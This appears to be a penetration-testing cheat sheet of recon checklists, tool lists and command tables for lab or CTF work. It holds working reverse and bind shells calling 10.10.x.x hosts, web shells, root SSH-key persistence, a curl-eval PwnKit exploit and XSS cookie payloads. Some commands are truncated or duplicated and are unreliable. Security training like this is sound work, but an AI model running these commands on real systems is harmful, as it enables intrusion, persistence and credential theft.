- Visit target's website
- Use BultWith navigator extension
- Get basic information like IP adresses
- Whois lookup
- Perform Github recon
- Check for CNAME Records of those subdomains
- Use WaybackUrls for urls
- Check for CORS misconfiguration on WebApp's target
- Check for Email Header Injection on reset password function
- Check For SMTP and HOST Header Injection
- Check For IFRAME (For Clickjacking)
- Check For Improper Access Control and Paranter Tampering
- Check Burp History for finding endpoint
- Use Arjun for finding hidden endpoints
- Check For CSRF
- Check For SSRF Parameters
- Check For XSS and SSTI
- Check Cryptography in Reset Password Token
- Check For Unicode Injection In Email Paramete
- Check For Bypassing Rate Limit : Headers : X-Originating-IP: IP X-Forwarded-For: IP X-Remote-IP: IP X-Remote-Addr: IP X-Client-IP: IP X-Forwarded-Host: IP
- Directory Brute-Force
- Check For HTTP Request Smuggling
- Check For Open Redirect Through WaybackURLs
- Check For Social-Signon Bypass
- Check For State Parameter in Social Sign-In & Check Whether it using multiple cookies injection.
- File-Upload CSRF, XSS, SSRF, RCE, LFI, XXE
- Buffer Overflows
- Dnscan - Dnscan is a python wordlist-based DNS subdomain scanner
- Nmap - The Network Mapper
- Zmap - ZMap is a fast single packet network scanner designed for Internet-wide network surveys
- Rustscan - The modern port scanner
- gobuster - Directory/File, DNS and VHost busting tool written in Go
- VirusTotal - Analyze suspicious files, domains, IPs and URLs to detect malware and other breaches
- Censys - Censys continually scans the public IPv4 address space on 3,552+
- Crt.sh - Certificate search tool
- Sublist3r - Fast subdomains enumeration tool for penetration testers
- HackerTarget - From attack surface discovery to vulnerability identification, actionable network intelligence for IT & security operations.
- Gobuster - Directory/File, DNS and VHost busting tool written in Go
- Omnisint - Rapid7's DNS Database easily searchable via a lightening fast API, with domains available in milliseconds
- Netcraft - Find out the technologies and infrastructure of any site
- WayBackMachine - Digital archive of the World Wide Web
- WayBackURLs - Fetch all the URLs that the Wayback Machine knows about for a domain
- Whatweb - Next generation web scanner
- Aquatone - A Tool for Domain Flyovers
- Wafw00f - Identify and fingerprint Web Application Firewall products protecting a website.
- Wappalyzer - Technology profiler, find out what websites are built with
- OpenVAS - Powerful open source vulnerability scanner
- Nikto - Web server scanner
- WPscan - WPScan WordPress security scanner
- Cmsmap - CMSmap is a python open source CMS scanner that automates the process of detecting security flaws of the most popular CMSs.
- Raccoon -
- XSStrike - Most advanced XSS scanner
- BruteXSS - BruteXSS is a tool written in python simply to find XSS vulnerabilities
- Xsser - Cross Site "Scripter" (aka XSSer) is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications
- Ffuf - Fast web fuzzer written in Go
- Onesixtyone - Fast SNMP Scanner
- LinEnum - Scripted Local Linux Enumeration & Privilege Escalation Checks
- Pwnkit pkexec - CVE-2021-4034 1day
- PEASS-ng - Privilege Escalation Awesome Scripts SUITE (with colors)
- Hashcat - World's fastest and most advanced password recovery utility
- Seclist - Collection of multiple types of lists used during security assessments, collected in one place
- Hob0Rules - Password cracking rules for Hashcat based on statistics and industry patterns
- obfuscation_detection - Collection of scripts to pinpoint obfuscated code
- javascript-obfuscator - A powerful obfuscator for JavaScript and Node.js
- Phantom-Evasion - Python antivirus evasion tool
- Jsconsole - Js deobfuscation website
- Pretier - An opinionated code formatter
- Beautifier - Improves the presentation of programming source code
- Jsnice - Make even obfuscated JavaScript code readable
- PayloadsAllTheThings - A list of useful payloads and bypass for Web Application Security and Pentest/CTF
- Xss payloads list - Cross Site Scripting ( XSS ) Vulnerability Payload List
- Exploit-db - The Exploit Database - Exploits, Shellcode, 0days, Remote Exploits, Local Exploits, Web Apps, Vulnerability Reports, Security Articles, Tutorials and more.
- PoC-in-GitHub - PoC auto collect from github
- Html2text - Convert HTML to Markdown-formatted text
- Cipher identifier - Identify the type of cipher
- Dcode - Decoding messages
- Online barecode reader - Free online barecode reader
- Cyberchef - A web app for encryption, encoding, compression and data analysis
- Usbrip - Tracking history of USB events on GNU/Linux
- LSB-steganography - Python program to steganography files into images using the Least Significant Bit
- Stego-kit - Collection of steganography tools
- Jset - JPEG steganography
- Zsteg - Detect stegano-hidden data in PNG & BMP
- Sstv - SSTV Decoder
- Slowrx - A decoder for Slow-Scanning Television (SSTV)
- Robot36 - Encode and decode images using SSTV in Robot 36 mode
- Ida - binary code analysis tool for reverse engineering
- Impacket - Impacket is a collection of Python classes for working with network protocols
- Sysinternals - Manage, troubleshoot and diagnose your Windows systems and applications
- PowerSploit - A PowerShell Post-Exploitation Framework
- BloodHound - BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory or Azure environment
- GitGuardian - GitGuardian is the code security platform for the DevOps generation
- Synk - Find and automatically fix vulnerabilities in your code
- Mitre - The mission of the CVE® Program is to identify, define, and catalog publicly disclosed cybersecurity vulnerabilities
- ExploitDB - Search Exploit Database for Exploits, Papers, and Shellcode
- Vulndb - Number one vulnerability database documenting and explaining security vulnerabilities, threats, and exploits since 1970
- CVE-details - Free CVE security vulnerability database/information source
- NVD-Nist - The NVD is the U.S. government repository of standards based vulnerability management data represented using the Security Content Automation Protocol (SCAP)
| Description | Command |
|---|---|
| Show our IP address | ifconfig/ip a |
| Check if a host is up | sudo nmap 10.129.2.18 -sn -oA host |
| Run nmap on an IP | nmap 10.10.10.40 |
| Scan network range | `` sudo nmap 10.129.2.0/24 -sn -oA tnet |
| Run an nmap script scan on an IP | nmap -sV -sC -p- -v 10.10.10.40 |
| Run an nmap script scan for upd with Os detection | nmap -sUV -T4 10.10.10.40 |
| Run an nmap script scan for top 100 udp ports | sudo nmap -F -sU 10.10.10.10 |
| Run a faster nmap script scan for upd | nmap -sUV -T4 -F --version-intensity 0 10.10.10.40 |
| Run an nmap script on top 10 ports | sudo nmap 10.10.10.10 --top-ports=10 |
| Track packets with SYN flags on port 21 | sudo nmap 10.10.10.10 -p 21 --packet-trace -Pn -n --disable-arp-ping |
| Track packets on a previously filtered port | sudo nmap 10.10.10.10 -p 139 --packet-trace -n --disable-arp-ping -Pn |
| List various available nmap scripts | locate scripts/citrix |
| Run an nmap script on an IP | nmap --script smb-os-discovery.nse -p445 10.10.10.40 |
| Grab banner of an open port | netcat 10.10.10.40 22 |
| List SMB Shares | smbclient -N -L \\\\10.10.10.40 |
| Connect to an SMB share | smbclient \\\\10.10.10.40\\users |
| Scan SNMP on an IP | snmpwalk -v 2c -c public 10.10.10.40 1.3.6.1.2.1.1.5.0 |
| Brute force SNMP secret string | onesixtyone -c dict.txt 10.10.10.40 |
| Scan number of open ports | rustscan -a 10.10.10.10 -u 3000 |
| Enumerate DNS information using dnsrecon | nmap --script=dns-zone-transfer -p 53 10.10.10.40 |
| Description | Command |
|---|---|
| Disables port scanning | -sn |
| Disables ICMP Echo Requests | -Pn |
| Disables DNS Resolution. | -n |
| Performs the ping scan by using ICMP Echo Requests against the target. | -PE |
| Shows all packets sent and received | --packet-trace |
| Displays the reason for a specific result | --reason |
| Disables ARP Ping Requests | --disable-arp-ping |
| Scans the specified top ports that have been defined as most frequent | --top-ports=<num> |
| Scan all ports | -p- |
| Scan all ports between 22 and 110 | -p22-110 |
| Scans only the specified ports 22 and 25 | -p22,25 |
| Scans top 100 ports | -F |
| Performs an TCP SYN-Scan | -sS |
| Performs an TCP ACK-Scan | -sA |
| Performs an UDP Scan | -sU |
| Scans the discovered services for their versions | -sV |
| Perform a Script Scan with scripts that are categorized as "default" | -sC |
| Performs a Script Scan by using the specified scripts | --script <script> |
| Performs an OS Detection Scan to determine the OS of the target | -O |
| Performs OS Detection, Service Detection, and traceroute scans | -A |
| Sets the number of random Decoys that will be used to scan the target | -D RND:5 |
| Specifies the network interface that is used for the scan | -e |
| Specifies the source IP address for the scan | -S 10.10.10.200 |
| Specifies the source port for the scan | -g |
| DNS resolution is performed by using a specified name server | --dns-server <ns> |
| DNS resolution for all target | -R |
| Description | Command |
|---|---|
| Stores the results in all available formats starting with the name of "filename" | -oA filename |
| Stores the results in normal format with the name "filename" | -oN filename |
| Stores the results in "grepable" format with the name of "filename" | -oG filename |
| Stores the results in XML format with the name of "filename" | -oX filename |
| Description | Command |
|---|---|
| Sets the number of retries for scans of specific ports | --max-retries <num> |
| Displays scan's status every 5 seconds | --stats-every=5s |
| Displays verbose output during the scan | -v/-vv |
| Sets the specified time value as initial RTT timeout | --initial-rtt-timeout 50ms |
| Sets the specified time value as maximum RTT timeout | --max-rtt-timeout 100ms |
| Sets the number of packets that will be sent simultaneously | --min-rate 300 |
| Specifies the specific timing template | -T <0-5> |
| Description | Command |
|---|---|
| Identify the A record for the target domain | nslookup $TARGET |
| Identify the A record for the target domain | nslookup -query=A $TARGET |
| Identify the A record for the target domain | dig $TARGET @<nameserver/IP> |
| Identify the A record for the target domain | dig a $TARGET @<nameserver/IP> |
| Identify the PTR record for the target IP address | nslookup -query=PTR <IP> |
| Identify the PTR record for the target IP address | dig -x <IP> @<nameserver/IP> |
| Identify ANY records for the target domain | nslookup -query=ANY $TARGET |
| Identify ANY records for the target domain | dig any $TARGET @<nameserver/IP> |
| Identify the TXT records for the target domain | nslookup -query=TXT $TARGET |
| Identify the TXT records for the target domain | dig txt $TARGET @<nameserver/IP> |
| Identify the MX records for the target domain | nslookup -query=MX $TARGET |
| Identify the MX records for the target domain | dig mx $TARGET @<nameserver/IP> |
| Check the using of a specific DNS Server. | nslookup example.com ns1.nsexample.com |
| Description | Command |
|---|---|
| Waybackurls: crawling URLs from a domain with the date it was obtained. | waybackurls -dates https://$TARGET > waybackurls.txt |
| DNS subdomain enumeration using knockpy | knockpy $TARGET -o subdomains.txt |
| DNS subdomain enumeration using Sn0int | sn0int domain $TARGET -o subdomains.txt |
| DNS subdomain enumeration using Chaos | chaos -d $TARGET -o subdomains.txt |
| DNS subdomain enumeration using Anubis | anubis -t $TARGET -o subdomains.txt |
| DNS subdomain enumeration using Netcraft | curl -s "https://searchdns.netcraft.com/?restriction=site+contains&host=$TARGET |
| Enumerate DNS information using dnschef | dnschef --nameserver 8.8.8.8 --domain $TARGET |
| Enumerate DNS information using dnsmap | dnsmap $TARGET -w /usr/share/wordlists/dnsmap.txt -r output.txt |
| Perform reverse IP lookup using HackerTarget | curl -s "https://api.hackertarget.com/reverseiplookup/?q=$TARGET |
| Perform reverse IP lookup using ViewDNS | curl -s "https://api.viewdns.info/reverseip/?host=$TARGET&apikey=<API_KEY>&output=json |
| Enumerate HTTP headers using hping3 | hping3 -S -p 80 $TARGET -c 1 -q; hping3 -R -p 80 $TARGET -c 1 -q |
| Enumerate HTTP headers using wget | wget --spider --server-response http://$TARGE |
| Query DNS records using dnsrecon with wildcard support | dnsrecon -d $TARGET -D /usr/share/wordlists/dnsrecon/subdomains-top1mil-20000.txt -t brt -a -o subdomains.txt |
| Check for DNS zone transfers using dnsrecon | dnsrecon -d $TARGET -t axfr -o zone-transfer.txt |
| Enumerate DNS information using dnsbrute | dnsbrute $TARGET --file /usr/share/wordlists/dnsmap.txt -o subdomains.txt |
| Perform email harvesting using Metagoofil | metagoofil -d $TARGET -t pdf,doc,xls,ppt,docx,pptx,xlsx -l 100 -n 50 -o metagoofil.txt -f metagoofil.html |
| Query GitHub for sensitive data using GitMiner | gitminer -q '$TARGET' --github-token <access_token> -o gitminer.txt |
| Search for subdomains on Certificate Transparency Logs using CT-Exposer | ct-exposer -d $TARGET -o subdomains.txt |
| Perform a SSL certificate transparency log search using certspotter | certspotter -d $TARGET -o subdomains.txt |
| Extract SSL certificate information using openssl | `` echo |
|
| Description | Command |
|---|---|
| Whatweb technology identification | whatweb -a https://www.example.com -v |
| Display HTTP headers of the target webserver | curl -I "http://${TARGET}" |
| Aquatone: makes screenshots of all subdomains in the subdomain.list | cat subdomain.list | aquatone -out ./aquatone -screenshot-timeout 1000 |
| WAF Fingerprinting | wafw00f -v https://$TARGE |
| Enumerate HTTP methods | nmap -p80 --script http-methods $TARGET |
| Nikto vulnerability scanner | nikto -h https://$TARGET -output nikto.txt |
| Nmap web server vulnerability scan | nmap -p 80,443 --script http-vuln-* $TARGET |
| Scan for open ports using masscan | masscan -p1-65535,U:1-65535 $TARGET --rate=1000 -oX masscan-output.xml |
| SSL/TLS security testing using testssl.sh | testssl.sh --color 0 --openssl-timeout 60 -U -E -f -p -y -H --phone-out $TARGET |
| SSL/TLS security testing using sslyze | sslyze --regular $TARGET --json_out sslyze_output.json |
| Eyewitness: Generate screenshots and HTML report from a list of URLs | eyewitness -f urls.txt -d ./eyewitness --web |
| WPScan: WordPress vulnerability scanner | wpscan --url https://$TARGET --enumerate u --api-token <API_TOKEN> |
| JoomScan: Joomla vulnerability scanner | joomscan -u https://$TARGET -ec |
| Droopescan: CMS vulnerability scanner | droopescan scan drupal -u https://$TARGET |
| Scan for open ports using Unicornscan | unicornscan -msf -v -I $TARGET:a |
| Gobuster: Directory brute forcing | gobuster dir -u https://$TARGET -w /usr/share/wordlists/dirb/common.txt -o gobuster.txt |
| Dirsearch: Directory brute forcing | dirsearch -u https://$TARGET -e php,asp,aspx,jsp,html -w /usr/share/wordlists/dirb/common.txt -o dirsearch.txt |
| FFuF: Fuzzing for web content | ffuf -u https://$TARGET/FUZZ -w /usr/share/wordlists/dirb/common.txt -o ffuf.txt |
| Arachni: Web application security scanner | arachni https://$TARGET --output-debug --report-save-path arachni_report.afr --audit-links --audit-forms --audit-cookies |
| Scan for open ports using Zmap | zmap -p 80 $TARGET_CIDR -o zmap_output.csv |
| Xprobe2: OS fingerprinting using ICMP | xprobe2 -v -p tcp:80:open $TARGET |
| OS fingerprinting using p0f | OS fingerprinting using p0f |
| Description | Command |
|---|---|
| All subdomains for a given domain | curl -s https://sonar.omnisint.io/subdomains/{domain} | jq -r '.[]' | sort -u |
| All TLDs found for a given domain | curl -s https://sonar.omnisint.io/tlds/{domain} | jq -r '.[]' | sort -u |
| All results across all TLDs for a given domain | curl -s https://sonar.omnisint.io/all/{domain} | jq -r '.[]' | sort -u |
| Reverse DNS lookup on IP address | curl -s https://sonar.omnisint.io/reverse/{ip} | jq -r '.[]' | sort -u |
| Reverse DNS lookup of a CIDR range | curl -s https://sonar.omnisint.io/reverse/{ip}/{mask} | jq -r '.[]' | sort -u |
| Certificate Transparency | curl -s "https://crt.sh/?q=${TARGET}&output=json" | jq -r '.[] | "\(.name_value)\n\(.common_name)"' | sort -u |
| TheHarvester: searching for subdomains and other information on the sources provided in the source.txt list | cat sources.txt | while read source; do theHarvester -d "${TARGET}" -b $source -f "${source}-${TARGET}";done |
| Sublist3r: to enumerate subdomains of specific domain | python sublist3r.py -d example.com |
| Description | Command |
|---|---|
| Gobuster: bruteforcing subdomains | gobuster dns -q -r "${NS}" -d "${TARGET}" -w "${WORDLIST}" -p ./patterns.txt -o "gobuster_${TARGET}.txt" |
| Zone Transfer using Nslookup against the target domain and its nameserver | nslookup -type=any -query=AXFR $TARGET nameserver.target.domain |
| Description | Command |
|---|---|
| Run a directory scan on a website | gobuster dir -u http://10.10.10.121/ -w /usr/share/dirb/wordlists/common.txt |
| Run a sub-domain scan on a website | gobuster dns -d example.com -w /usr/share/SecLists/Discovery/DNS/namelist.txt |
| Grab website banner | curl -IL https://www.example.com |
| List details about the webserver/certificates | whatweb 10.10.10.121 |
| List potential directories in robots.txt | curl 10.10.10.121/robots.txt |
| Perform a directory brute force using DirBuster | dirb http://10.10.10.40 /usr/share/wordlists/dirb/common.txt |
|
| Description | Command |
|---|---|
| List potential directories in robots.txt | curl 10.10.10.121/robots.txt |
| List potential directories in robots.txt | curl 10.10.10.121/robots.txt |
| Base64 encode | echo value | base64 |
| Base64 decode | echo ENCODED_B64 | base64 -d |
| Hex encode | echo VALUE | xxd -p |
| Hex decode | echo ENCODED_HEX | xxd -p -r |
| Rot13 encode | echo VALUE | tr 'A-Za-z' 'N-ZA-Mn-za-m' |
| Rot13 decode | echo ENCODED_ROT13 | tr 'A-Za-z' 'N-ZA-Mn-za-m' |
| Description | Command |
|---|---|
| Directory Fuzzing with ffuf | ffuf -w /Seclist/Discovery/Web-content/directory.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ |
| Extension Fuzzing with ffuf | ffuf -w /Seclist/Discovery/Web-content/web-extension.txt:FUZZ -u http://SERVER_IP:PORT/indexFUZZ |
| Page Fuzzing with ffuf | ffuf -w /Seclist/Discovery/Web-content/directory.txt:FUZZ -u http://SERVER_IP:PORT/blog/FUZZ.php |
| Recursive Fuzzing with ffuf | ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ -recursion -recursion-depth 1 -e .php -v |
| Subdomain Fuzzing with ffuf | ffuf -w /Seclist/Discovery/Web-content/subdomains.txt:FUZZ -u https://FUZZ.example.com |
| VHost Fuzzing with ffuf | ffuf -w /Seclist/Discovery/DNS/subdomains-top1million-110000.txt:FUZZ -u http://example.com:PORT/ -H 'Host: FUZZ.example.com' -fs xxx |
| Get parameter Fuzzing with ffuf | ffuf -w /Seclist/Discovery/Web-convent/burp-parameters.txt:FUZZ -u http://example.com:PORT/admin/admin.php?FUZZ=key -fs xxx |
| Post parameter Fuzzing with ffuf | ffuf -w /Seclist/Discovery/Web-convent/burp-parameters.txt:FUZZ -u http://example.com:PORT/admin/admin.php -X POST -d 'FUZZ=key' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx |
| Value Fuzzing with ffuf | ffuf -w ids.txt:FUZZ -u http://example.com:PORT/admin/admin.php -X POST -d 'id=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx |
| Description | Command |
|---|---|
| Directory and page wordlist | /secLists/Discovery/Web-Content/directory-list-2.3-small.txt |
| Extension wordlist | /secLists/Discovery/Web-Content/web-extensions.txt |
| Domain wordlist | secLists/Discovery/DNS/subdomains-top1million-5000.txt |
| Parameters wordlist | secLists/Discovery/Web-Content/burp-parameter-names.txt |
| Create integer wordlist | for i in $(seq 1 1000); do echo $i >> ids.txt; done |
| Description | Command |
|---|---|
| Search for public exploits for a web application | searchsploit openssh 7.2 |
| MSF: Start the Metasploit Framework | msfconsole |
| MSF: Search for public exploits in MSF | search exploit eternalblue |
| MSF: Start using an MSF module | use exploit/windows/smb/ms17_010_psexec |
| MSF: Show required options for an MSF module | show options |
| MSF: Show advanced options for an MSF module | show advanced options |
| MSF: Set a value for an MSF module option | set RHOSTS 10.10.10.40 |
| MSF: Test if the target server is vulnerable | check |
| MSF: Run the exploit on the target server is vulnerable | exploit |
| Description | Command |
|---|---|
| Test php code execution | <?php system('id'); ?> |
| Start a nc listener on a local port | nc -lvnp 1234 |
| Send a reverse shell from the remote server | bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1' |
| Another command to send a reverse shell from the remote server | rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f |
| Start a bind shell (bash) | rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1 | nc -lvp 1234 >/tmp/f |
| Start a bind shell (python) | python -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("0.0.0.0",1234));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")' |
| Start a bind shell (powershell) | powershell -NoP -NonI -W Hidden -Exec Bypass -Command $listener = [System.Net.Sockets.TcpListener]1234; $listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + " ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close(); |
| Start a reverse shell from php | <?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 4444 >/tmp/f"); ?> |
| Add a reverse shell in php code | system($_GET['cmd']); |
| Connect to a bind shell started on the remote server | nc 10.10.10.1 1234 |
| Python: Upgrade shell TTY | python -c 'import pty; pty.spawn("/bin/bash")' |
| Upgrade shell TTY (2) | ctrl+z then stty raw -echo then fg then enter twice |
| Start a webshell (php) | <?php system($_REQUEST["cmd"]); ?> |
| Start a webshell (jsp) | <% Runtime.getRuntime().exec(request.getParameter("cmd")); %> |
| Start a webshell (asp) | <% eval request("cmd") %> |
| Create a webshell php file | echo "<?php system(\$_GET['cmd']);?>" > /var/www/html/shell.php |
| Execute a command on an uploaded webshell | curl http://SERVER_IP:PORT/shell.php?cmd=COMMAND |
| Start socat listener | socat file:`tty`,raw,echo=0 tcp-listen:4444 |
| Start a socat reverse shell on remote server | socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 |
| Download the corrrect socat architecture and exec reserse shell | wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 |
| Description | Command |
|---|---|
| Run linpeas script to enumerate remote server | ./linpeas.sh |
| List available sudo privileges | sudo -l |
| Run a command with sudo | sudo -u user /bin/echo Hello World! |
| Switch to root user (if we have access to sudo su) | sudo su - |
| Switch to a user (if we have access to sudo su) | sudo su user - |
| Create a new SSH key | ssh-keygen -f key |
| Add the generated public key to the user | echo "ssh-rsa AAAAB...SNIP...M= user@parrot" >> /root/.ssh/authorized_keys |
| SSH to the server with the generated private key | ssh root@10.10.10.10 -i key |
| Add a reverse shell at the end of file | echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 8443 >/tmp/f' | tee -a monitor.sh |
| Single script pwnkit pkexec CVE-2021-4034 | eval "$(curl -s https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/cve-2021-4034.sh)" |
| Dirty pipe CVE-2022-0847 | git clone https://github.com/imfiver/CVE-2022-0847.git && cd CVE-2022-0847 && chmod +x && Dirty-Pipe.sh && bash Dirty-Pipe.sh |
| Description | Command |
|---|---|
| Start a local webserver | python3 -m http.server 8000 |
| Download a file on the remote server from our local machine | wget http://10.10.14.1:8000/linpeas.sh |
| Download a file on the remote server from our local machine | curl http://10.10.14.1:8000/linenum.sh -o linenum.sh |
| Transfer a file to the remote server with scp (requires SSH access) | scp linenum.sh user@remotehost:/tmp/linenum.sh |
| Convert a file to base64 | base64 shell -w 0 |
| Convert a file from base64 back to its orig | echo f0VMR...SNIO...InmDwU | base64 -d > shell |
| Check the file's md5sum to ensure it converted correctly | md5sum shell |
| Description | Command |
|---|---|
| GET request with cURL | curl http://example.com |
| Verbose GET request with cURL | curl http://example.com -v |
| cURL Basic Auth login | curl http://admin:password@example.com/ -vvv |
| Alternate cURL Basic Auth login | curl -u admin:password http://example.com/ -vvv |
| cURL Basic Auth login, follow redirection | curl -u admin:password -L http://example.com/ |
| cURL GET request with parameter | pcurl -u admin:password 'http://example.com/search.php?port_code=us' |
| POST request with cURL | curl -d 'username=admin&password=password' -L http://example.com/login.php |
| Debugging with cURL | curl -d 'username=admin&password=password' -L http://example.com/login.php -v |
| Cookie usage with cURL | curl -d 'username=admin&password=password' -L --cookie-jar /dev/null http://example.com/login.php -v |
| cURL with cookie file | curl -d 'username=admin&password=password' -L --cookie-jar cookies.txt http://example.com/login.php |
| cURL specify content type | curl -H 'Content-Type: application/json' -d '{ "username" : "admin", "password" : "password" }' |
| cURL OPTIONS request | curl -X OPTIONS http://example.com/ -vv |
| File upload with cURL | curl -X PUT -d @test.txt http://example.com/test.txt -vv |
| DELETE method with cURL | curl -X DELETE http://example.com/test.txt -vv |
| cURL w/ POST | curl http://example.com:PORT/admin/admin.php -X POST -d 'id=key' -H 'Content-Type: application/x-www-form-urlencoded' |
| Description | Command |
|---|---|
| Basic XSS Payload to test target | <script>alert(window.origin)</script> |
| Basic XSS Payload to test target | <plaintext> |
| Basic XSS Payload to test target | <script>print()</script> |
| HTML-based XSS Payload | <img src="" onerror=alert(window.origin)> |
| Get the cookie value | #"><img src=/ onerror=alert(document.cookie)> |
| Description | Command |
|---|---|
| Get wp core version | curl -s -X GET http://example.com | grep '<meta name="generator"' |
| Plugins enumeration | curl -s -X GET http://example.com | sed 's/href=/\n/g' | sed 's/src=/\n/g' | grep 'wp-content/plugins/*' | cut -d"'" -f2 |
| Themes enumeration | curl -s -X GET http://example.com | sed 's/href=/\n/g' | sed 's/src=/\n/g' | grep 'themes' | cut -d"'" -f2 |
| Check response header for file or directory | curl -I -X GET http://example.com/wp-content/plugins/form-contact/ | html2text |
| Check the user list with JSON endpoint | curl http://example.com/wp-json/wp/v2/users | jq |
| XML-RPC: Check if XML-RPC server accecpts requests | curl http://example.com/xmlrpc.php |
| XML-RPC: Check if a user exists with POST | curl -s -I -X GET http://example.com/?author=1 |
| XML-RPC: List all methods enabled | curl -X POST -d "<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>user</value></param><param><value>CORRECT-PASSWORD</value></param></params></methodCall>" http://example.com/xmlrpc.php | grep "<value><string>" |
| XML-RPC: Connect with credentials | curl -X POST -d "<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>user</value></param><param><value>CORRECT-PASSWORD</value></param></params></methodCall>" http://example.com/xmlrpc.php |
| WPscan enumeration | wpscan --url http://example.com --enumerate --api-token TOKEN |
| WPscan brute force login with XML-RPC | wpscan --password-attack xmlrpc -t 20 -U admin, david -P passwords.txt --url http://example.com |
| Get reverse shell in malicious 404 | curl -X GET "http://<target>/wp-content/themes/twentyseventeen/404.php?cmd=id" |
| Description | Command |
|---|---|
| Windows version | `` Get-WmiObject -Class win32_OperatingSystem |
| Start python http server | python3 -m http.server 8000 |
| Description | Command |
|---|---|
| Add DNS entry | sudo sh -c 'echo "SERVER_IP example.com" >> /etc/hosts' |
| Start python http server | python3 -m http.server 8000 |
-
Enumeration/Scanning with Nmap - perform a quick scan for open ports followed by a full port scan
-
Web Footprinting - check any identified web ports for running web applications, any hidden files/directories. Some useful tools for ths phase include whatweb and Gobuster
-
After identifying the technologies in use, use a tool such as Searchsploit to find public exploits or search on Google for manual exploitation techniques
-
Identifying the technologies in use, and use tools like Searchsploit to find public exploits or search on Google for manual exploitation techniques
-
After gaining an initial foothold, use the Python3 pty trick to upgrade to a pseudo TTY
-
Perform manual and automated enumeration of the file system looking for misconfigurations, services with known vulnerabilities, and sensitive data in cleartext such as credentials
-
Organize this data offline to determine the various ways to escalate privileges to root on this target
-
It's possible to gain a foothold by using Metasploit or manually
-
After obtaining a foothold, it's possible to escalate privilege to root on the target by using scripts such as LinEnum or LinPEAS.
- Identifying the Risk: Identify the risks to which the business is exposed, such as legal, environmental, market, regulatory and other risks.
- Analyze the Risk: Analyze risks to determine their impact and likelihood. Risks should be mapped to the organization's various operational policies, procedures and processes.
- Evaluate the Risk: Assess, classify and prioritize risks. Then the organization must decide whether to accept (inevitable), avoid (change plans), control (mitigate) or transfer the risk (insure).
- Dealing with Risk: Eliminate or contain the risks as best as possible. This is managed by directly interfacing with stakeholders for the system or process to which the risk is associated.
- Monitoring Risk: All risks must be continuously monitored. Risks should be continuously monitored for any changes in circumstances that may change their impact score, from low to medium or high impact.
- Injection: SQL injection, command injection, LDAP injection, etc.
- Broken Auhtentification: Misconfigurations of authentication and session management can lead to unauthorized access to an application through password guessing attacks or improper session timeout, among others problems.
- Sensitive Data Exposure: Inappropriately protect data such as financial, health or personally identifiable information.
- XML External Entities: Misconfigured XML processors that can lead to internal file disclosure, port scanning, remote code execution, or denial of service attacks.
- Broken Access control: Restrictions are not implemented appropriately to prevent users from accessing other user accounts, viewing sensitive data, accessing unauthorized features, modifying data, etc.
- Security misconfiguration: Insecure default configurations, open cloud storage, error messages that leak too much information.
- Cross-site Scripting XSS: XSS occurs when an application improperly sanitizes user-supplied input, allowing HTML or JavaScript to execute in a victim's browser. This can lead to session hijacking, website defacement, redirecting a user to a malicious website, and more.
- Insecure Deserialization: This flaw often leads to code execution, injection attacks or privilege escalation attacks.
- Using component with known vulnerabilities: All components used by an application (libraries, frameworks, software modules) run with the same privilege as the application. If the application uses components with known flaws, it may lead to exposure of sensitive data or remote code execution.
- Insufficient Logging & monitoring: Flaws in logging and monitoring can allow a successful attack to go undetected, attackers to establish a persistent connection in the network, to tamper with or extract sensitive data without being noticed.